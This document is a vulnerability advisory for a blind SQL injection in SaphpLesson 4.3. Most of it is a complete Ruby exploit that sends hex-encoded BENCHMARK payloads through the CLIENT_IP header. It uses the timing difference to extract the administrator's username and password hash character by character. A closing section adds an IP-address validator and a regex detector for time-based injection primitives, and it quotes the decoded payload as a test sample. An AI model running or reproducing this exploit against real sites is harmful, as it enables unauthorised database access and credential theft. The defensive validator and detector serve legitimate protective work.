SaphpLesson 4.3 SQL Injection

Date: 16 Sep 2009 00:00:00
Reported by: Jafer Al Zidjali
Type: packetstorm
Source: packetstormsecurity.com

SaphpLesson v4.3 Blind SQL Injection Vulnerability, discovered by Jafer Al Zidjali on 21-08-2009; a public patch has been released. The injection point is the CLIENT_IP request header. The exploit script first measures the average and the deliberately delayed response time, then uses the timing difference to retrieve the username length, the username characters and the password hash one character at a time.

Code

```ruby
#!/usr/bin/ruby

#=============================================#
# SaphpLesson v4.3 Exploit                    #
# Blind SQL Injection Vulnerability           #
#---------------------------------------------#
# Date: 21-08-2009                            #
# Discovered & written by: Jafer Al Zidjali   #
# Email: jafer[at]scorpionds.com              #
# Website: www.scorpionds.com                 #
#---------------------------------------------#
# Notes:                                      #
# 1. Author has been notified                 #
# 2. A public patch has been released         #
#=============================================#

require "net/http"
require "base64"

intro = [
  "+=============================================+",
  "+ SaphpLesson v4.3 Exploit                    +",
  "+ Blind SQL Injection Vulnerability           +",
  "+ Discovered & written by: Jafer Al Zidjali   +",
  "+ Email: jafer[at]scorpionds.com              +",
  "+ Website: www.scorpionds.com                 +",
  "+=============================================+"
]

# Print the banner one character at a time with a spinning cursor.
def print_intro(text)
  w = "|"
  text.each do |str|
    str.scan(/./) do |c|
      STDOUT.flush
      if w == "|"
        print "\b" + c + w
        w = "/"
      elsif w == "/"
        print "\b" + c + w
        w = "-"
      elsif w == "-"
        print "\b" + c + w
        w = "\\"
      else
        print "\b" + c + w
        w = "|"
      end
      sleep 0.04
    end
    print "\b "
    puts ""
  end
end

print_intro intro

puts "\nEnter host name (e.g. example.com):"
host = gets.chomp

puts "\nEnter script path (e.g. /saphplesson/):"
path = gets.chomp

# Step 1: baseline. Time five plain requests and average them; any later
# response slower than three times this average is treated as "delayed".
puts "\nGetting average response time..."

avgTime = Array.new(5)

5.times do |c|
  s = Time.now
  http = Net::HTTP.new(host, 80)
  resp = http.get(path)
  w = resp.body
  avgTime[c] = Time.now - s
  puts avgTime[c]
end

sum = 0
5.times { |c| sum += avgTime[c] }
avg = sum / 5.0
puts "Average response time: #{avg} (delay threshold, 3x average: #{avg * 3.0})"

# Step 2: calibration. Send the injected condition through the CLIENT_IP header
# with increasing BENCHMARK iteration counts and report how long each takes, so
# the operator can pick a delay that is clearly above the baseline.
puts "\nTesting delayed response time..."
delTime = Array.new(5)

5.times do |t|
  delay = 1000000 * ((t + 1) * 10)
  header = {
    "CLIENT_IP" => "\x27\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54" +
                   "\x20\x49\x46\x28\x31\x3d\x31\x2c\x42\x45\x4e\x43\x48\x4d" +
                   "\x41\x52\x4b\x28#{delay}\x2c\x63\x68\x61\x72\x28\x63\x68" +
                   "\x61\x72\x28\x32\x29\x29\x29\x2c\x33\x34\x33\x34\x29\x20\x23\x20"
  }
  s = Time.now
  http = Net::HTTP.new(host, 80)
  resp = http.get(path, header)
  w = resp.body
  s = Time.now - s
  delTime[t] = delay # stores the BENCHMARK count used, not the measured time
  puts "[" + (t + 1).to_s + "] #{s}"
end

puts "\nChoose a delayed response time (it should be > average response time):"
sel = gets.chomp

# Step 3: username length. For each candidate length 1..20 the database only
# runs BENCHMARK when the length matches, so the first delayed response gives it.
print "\nGetting username length"
ulen = 0

20.times do |z|
  header = {
    "CLIENT_IP" => "\x27\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54" +
                   "\x20\x49\x46\x28\x6c\x65\x6e\x67\x74\x68\x28\x28\x73\x65\x6c\x65\x63\x74" +
                   "\x20\x4d\x6f\x64\x4e\x61\x6d\x65\x20\x66\x72\x6f\x6d\x20\x6d\x6f\x64\x72" +
                   "\x65\x74\x6f\x72\x20\x77\x68\x65\x72\x65\x20\x4d\x6f\x64\x49\x44\x3d\x31" +
                   "\x29\x29\x3d#{z + 1}\x2c\x42\x45\x4e\x43\x48\x4d\x41\x52\x4b\x28#{delTime[sel.to_i - 1]}" +
                   "\x2c\x63\x68\x61\x72\x28\x63\x68\x61\x72\x28\x32\x29\x29\x29\x2c\x33\x34\x33\x34\x29\x20\x23\x20"
  }
  s = Time.now
  http = Net::HTTP.new(host, 80)
  resp = http.get(path, header)
  w = resp.body
  s = Time.now - s
  print "."
  if s > (avg * 3.0)
    ulen = z + 1
    break
  end
  STDOUT.flush
end

puts "\n\nUsername length: " + ulen.to_s

# Step 4: username characters. For each position, try every candidate character;
# the one that produces a delayed response is printed and kept.
puts "\n\nUsername: "
chars = "abcdefghijklmnopqrstuvwxyz0123456789"

ulen.times do |z|
  chars.scan(/./) do |c|
    header = {
      "CLIENT_IP" => "\x27\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43" +
                     "\x54\x20\x49\x46\x28\x73\x75\x62\x73\x74\x72\x69\x6e\x67\x28\x28\x73" +
                     "\x65\x6c\x65\x63\x74\x20\x4d\x6f\x64\x4e\x61\x6d\x65\x20\x66\x72\x6f" +
                     "\x6d\x20\x6d\x6f\x64\x72\x65\x74\x6f\x72\x20\x77\x68\x65\x72\x65\x20" +
                     "\x4d\x6f\x64\x49\x44\x3d\x31\x29\x2c#{z + 1}\x2c\x31\x29\x3d\x27#{c}\x27" +
                     "\x2c\x42\x45\x4e\x43\x48\x4d\x41\x52\x4b\x28#{delTime[sel.to_i - 1]}" +
                     "\x2c\x63\x68\x61\x72\x28\x63\x68\x61\x72\x28\x32\x29\x29\x29\x2c\x33" +
                     "\x34\x33\x34\x29\x20\x23\x20"
    }
    s = Time.now
    http = Net::HTTP.new(host, 80)
    resp = http.get(path, header)
    w = resp.body
    s = Time.now - s
    print c
    if s > (avg * 3.0)
      break
    end
    print "\b"
    STDOUT.flush
  end
end

# Step 5: password hash, same technique over 32 hex positions.
puts "\n\nPassword hash: "
chars = "0123456789abcdef"

32.times do |z|
  chars.scan(/./) do |c|
    header = {
      "CLIENT_IP" => "\x27\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54" +
                     "\x20\x49\x46\x28\x73\x75\x62\x73\x74\x72\x69\x6e\x67\x28\x28\x73\x65\x6c" +
                     "\x65\x63\x74\x20\x4d\x6f\x64\x50\x61\x73\x73\x77\x6f\x72\x64\x20\x66\x72" +
                     "\x6f\x6d\x20\x6d\x6f\x64\x72\x65\x74\x6f\x72\x20\x77\x68\x65\x72\x65\x20" +
                     "\x4d\x6f\x64\x49\x44\x3d\x31\x29\x2c#{z + 1}\x2c\x31\x29\x3d\x27#{c}\x27\x2c" +
                     "\x42\x45\x4e\x43\x48\x4d\x41\x52\x4b\x28#{delTime[sel.to_i - 1]}" +
                     "\x2c\x63\x68\x61\x72\x28\x63\x68\x61\x72\x28\x32\x29\x29\x29\x2c\x33\x34" +
                     "\x33\x34\x29\x20\x23\x20"
    }
    s = Time.now
    http = Net::HTTP.new(host, 80)
    resp = http.get(path, header)
    w = resp.body
    s = Time.now - s
    print c
    if s > (avg * 3.0)
      break
    end
    print "\b"
    STDOUT.flush
  end
end
```
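As an added defensive example, not part of the original exploit or of SaphpLesson: the script injects through the CLIENT_IP request header and reads the answer from response timing, so the two controls that matter are a strict validator for that header (it must parse as an IP address before it touches a query) and a detector for the delay primitives that time-based blind injection depends on. The function names, the verdict symbols and the sample header values are constructed for this illustration.

```ruby
require "ipaddr"

# Constructed sample header values. "attack" is the plain-text form of the
# bytes the calibration probe above sends; the others are ordinary or malformed.
SAMPLE_HEADERS = {
  "baseline" => "203.0.113.7",
  "attack"   => "' UNION SELECT IF(1=1,BENCHMARK(10000000,char(char(2))),3434) # ",
  "ipv6"     => "2001:db8::1",
  "garbage"  => "1.2.3.4 OR 1=1",
}

# Delay primitives used by time-based blind injection on common DBMSs
# (MySQL BENCHMARK/SLEEP, PostgreSQL pg_sleep, MSSQL WAITFOR DELAY).
TIME_BASED_SQL = /\b(?:BENCHMARK|SLEEP|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b/i

# Detection: does the value carry a time-based payload worth alerting on?
def time_based_sqli?(value)
  TIME_BASED_SQL.match?(value.to_s)
end

# Mitigation: return the normalised IP string, or nil when the value is not
# an address. IPAddr rejects quotes, spaces and SQL keywords outright, so
# the application never builds a query from anything but a real IP.
def validate_client_ip(value)
  IPAddr.new(value.to_s.strip).to_s
rescue IPAddr::InvalidAddressError, ArgumentError
  nil
end

# Decide what to do with one CLIENT_IP value:
#   [:accept, ip]  - a valid address, safe to store
#   [:alert, nil]  - rejected and carrying a time-based payload, log it
#   [:reject, nil] - rejected for any other reason
def classify_client_ip(value)
  ip = validate_client_ip(value)
  return [:accept, ip] if ip
  time_based_sqli?(value) ? [:alert, nil] : [:reject, nil]
end

if __FILE__ == $0
  SAMPLE_HEADERS.each do |label, value|
    verdict, ip = classify_client_ip(value)
    puts "#{label.ljust(9)} #{verdict}#{ip ? " (#{ip})" : ""}"
  end
end
```

Validation alone already closes the injection; the detector exists so that probes like the calibration loop above show up in logs instead of failing silently.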
